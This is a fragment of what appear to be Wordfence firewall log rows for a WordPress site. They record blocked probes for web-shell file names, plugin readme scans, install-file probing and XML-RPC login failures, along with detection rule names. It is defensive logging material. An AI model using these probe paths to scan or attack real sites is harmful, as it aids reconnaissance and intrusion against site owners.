(50852, 1712062370.981115, 1712062370.542300, '\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 0, 403, 0, 0, 0, 'https://happythinking.com/css.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Nzcy5waHA=","category":"brute-force","ssl":1}'),
(50521, 1711401277.618334, 1711401276.664100, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/core-stab/index.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9jb3JlLXN0YWIvaW5kZXgucGhw","category":"brute-force","ssl":1}'),
(50509, 1711394445.034554, 1711394444.634900, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/backup/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L2JhY2t1cC93cC1hZG1pbi9pbnN0YWxsLnBocA==","path":"L2JhY2t1cC93cC1hZG1pbi9pbnN0YWxsLnBocA==","category":"discovery-and-probing","ssl":1}'),
(50508, 1711394447.324198, 1711394446.919500, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/site/wp-admin/install.php', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 'blocked:waf', 'WordPress New Install File Probing', '{"learningMode":0,"failedRules":"506","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3NpdGUvd3AtYWRtaW4vaW5zdGFsbC5waHA=","path":"L3NpdGUvd3AtYWRtaW4vaW5zdGFsbC5waHA=","category":"discovery-and-probing","ssl":1}'),
(51782, 1712381060.289689, 1712381059.889100, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾`v', 0, 403, 0, 0, 0, 'https://happythinking.com/shell.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NoZWxsLnBocA==","category":"brute-force","ssl":1}'),
(51747, 1712368245.246890, 1712368244.347200, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/uploader/readme.txt', NULL, 'Mozilla/5.0 (iPhone; CPU iPhone OS 16_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Mobile/15E148 Safari/604.2.82', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy91cGxvYWRlci9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy91cGxvYWRlci9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(51728, 1712368238.429890, 1712368238.073500, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/mm-forms-community/readme.txt', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5; rv:86.0) Gecko/20100101 Firefox/86.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9tbS1mb3Jtcy1jb21tdW5pdHkvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9tbS1mb3Jtcy1jb21tdW5pdHkvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(51853, 0.000000, 1712449867.769190, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50636, 1711731936.503665, 1711731936.172900, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-admin/user/xmrlpc.php?p=', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtYWRtaW4vdXNlci94bXJscGMucGhw","category":"brute-force","ssl":1}'),
(50635, 1711731937.778131, 1711731937.455400, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///img/xmrlpc.php?p=', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vaW1nL3htcmxwYy5waHA=","category":"brute-force","ssl":1}'),
(50646, 1711731918.187859, 1711731917.756100, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com//alfa-rex2.php7', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly9hbGZhLXJleDIucGhwNw==","category":"brute-force","ssl":1}'),
(50576, 1711655583.306543, 1711655582.704600, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ÿ', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/simple.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(51699, 1712368003.987384, 1712368003.576600, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wp-carouselslideshow/readme.txt', NULL, 'Mozilla/5.0 (iPod touch; CPU iPhone OS 14_3 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) FxiOS/122.0 Mobile/15E148 Safari/605.1.15', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1jYXJvdXNlbHNsaWRlc2hvdy9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1jYXJvdXNlbHNsaWRlc2hvdy9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(51745, 1712368246.767074, 1712368246.310200, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wordpress-member-private-conversation/readme.txt', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3; rv:109.0) Gecko/20100101 Firefox/122.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93b3JkcHJlc3MtbWVtYmVyLXByaXZhdGUtY29udmVyc2F0aW9uL3JlYWRtZS50eHQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93b3JkcHJlc3MtbWVtYmVyLXByaXZhdGUtY29udmVyc2F0aW9uL3JlYWRtZS50eHQ=","category":"discovery-and-probing","ssl":1}'),
(51731, 1712368236.156161, 1712368235.859500, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/flipbook/readme.txt', NULL, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:115.0) Gecko/20100101 Firefox/115.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9mbGlwYm9vay9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9mbGlwYm9vay9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(51787, 0.000000, 1712381252.460378, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51740, 1712368249.185060, 1712368248.822900, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/seo-watcher/readme.txt', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4; rv:82.0) Gecko/20100101 Firefox/82.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW8td2F0Y2hlci9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW8td2F0Y2hlci9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(51788, 0.000000, 1712382092.216184, '\0\0\0\0\0\0\0\0\0\0ÿÿ1+\0é', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51789, 0.000000, 1712382295.033974, '\0\0\0\0\0\0\0\0\0\0ÿÿ\\SgÕ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51741, 1712368249.184804, 1712368248.822900, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/seo-watcher/readme.txt', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4; rv:82.0) Gecko/20100101 Firefox/82.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW8td2F0Y2hlci9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW8td2F0Y2hlci9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(51790, 0.000000, 1712382628.875610, '\0\0\0\0\0\0\0\0\0\0ÿÿÄ½Å', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51742, 1712368247.971940, 1712368247.626800, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/reflex-gallery/readme.txt', NULL, 'Mozilla/5.0 (Android 14; Mobile; rv:109.0) Gecko/122.0 Firefox/122.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9yZWZsZXgtZ2FsbGVyeS9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9yZWZsZXgtZ2FsbGVyeS9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(51743, 1712368247.971704, 1712368247.626800, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/reflex-gallery/readme.txt', NULL, 'Mozilla/5.0 (Android 14; Mobile; rv:109.0) Gecko/122.0 Firefox/122.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9yZWZsZXgtZ2FsbGVyeS9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9yZWZsZXgtZ2FsbGVyeS9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(51786, 1712381051.343368, 1712381050.936600, '\0\0\0\0\0\0\0\0\0\0ÿÿ’¾`v', 0, 403, 0, 0, 0, 'https://happythinking.com/atomlib.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2F0b21saWIucGhw","category":"brute-force","ssl":1}'),
(51744, 1712368246.767333, 1712368246.310200, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wordpress-member-private-conversation/readme.txt', NULL, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3; rv:109.0) Gecko/20100101 Firefox/122.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93b3JkcHJlc3MtbWVtYmVyLXByaXZhdGUtY29udmVyc2F0aW9uL3JlYWRtZS50eHQ=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93b3JkcHJlc3MtbWVtYmVyLXByaXZhdGUtY29udmVyc2F0aW9uL3JlYWRtZS50eHQ=","category":"discovery-and-probing","ssl":1}'),
(51791, 0.000000, 1712383654.725379, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51792, 0.000000, 1712386077.675121, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50269, 0.000000, 1711073588.877973, '\0\0\0\0\0\0\0\0\0\0ÿÿgx²Ù', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50872, 1712062410.079531, 1712062409.681600, '\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 0, 403, 0, 0, 0, 'https://happythinking.com/moon.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L21vb24ucGhw","category":"brute-force","ssl":1}'),
(50588, 1711678604.987471, 1711678604.502900, '\0\0\0\0\0\0\0\0\0\0ÿÿ¹ÙÅ…', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', 'https://www.google.com', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{"learningMode":0,"failedRules":"","paramKey":"","paramValue":"","path":"L3dwLWxvZ2luLnBocA=="}'),
(50585, 1711672824.167012, 1711672823.780000, '\0\0\0\0\0\0\0\0\0\0ÿÿYlmk', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/gotmls/readme.txt', NULL, 'Mozilla/5.0 (iPad; CPU OS 14_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/87.0.4280.77 Mobile/15E148 Safari/604.1', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC5wYXRo","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb3RtbHMvcmVhZG1lLnR4dA==","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb3RtbHMvcmVhZG1lLnR4dA==","category":"discovery-and-probing","ssl":1}'),
(50520, 1711401280.122860, 1711401279.421100, '\0\0\0\0\0\0\0\0\0\0ÿÿæ-Ã', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/core-stab/RxRlfwrz.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9jb3JlLXN0YWIvUnhSbGZ3cnoucGhw","category":"brute-force","ssl":1}'),
(51452, 0.000000, 1712320663.296455, '\0\0\0\0\0\0\0\0\0\0ÿÿ¹µl±', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(50971, 1712207467.827810, 1712207467.448100, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/seo.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3Nlby5waHA=","category":"brute-force","ssl":1}'),
(51449, 0.000000, 1712320652.259932, '\0\0\0\0\0\0\0\0\0\0ÿÿ-ìwñ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51450, 0.000000, 1712320653.744035, '\0\0\0\0\0\0\0\0\0\0ÿÿºØ!þ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51451, 0.000000, 1712320659.819890, '\0\0\0\0\0\0\0\0\0\0ÿÿ1+)ß', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(50972, 1712207453.593767, 1712207453.167300, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/lv.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2x2LnBocA==","category":"brute-force","ssl":1}'),
(51364, 0.000000, 1712320302.231106, '\0\0\0\0\0\0\0\0\0\0ÿÿ³Ó$C', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51365, 0.000000, 1712320305.718834, '\0\0\0\0\0\0\0\0\0\0ÿÿ-û!¹', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51366, 0.000000, 1712320309.025002, '\0\0\0\0\0\0\0\0\0\0ÿÿO@', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51367, 0.000000, 1712320309.051867, '\0\0\0\0\0\0\0\0\0\0ÿÿqkž', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51368, 0.000000, 1712320317.919222, '\0\0\0\0\0\0\0\0\0\0ÿÿ1+ í', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51369, 0.000000, 1712320319.421800, '\0\0\0\0\0\0\0\0\0\0ÿÿ;`ÖH', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51370, 0.000000, 1712320324.853373, '\0\0\0\0\0\0\0\0\0\0ÿÿN9%À', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51371, 0.000000, 1712320325.714186, '\0\0\0\0\0\0\0\0\0\0ÿÿf‰\r', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
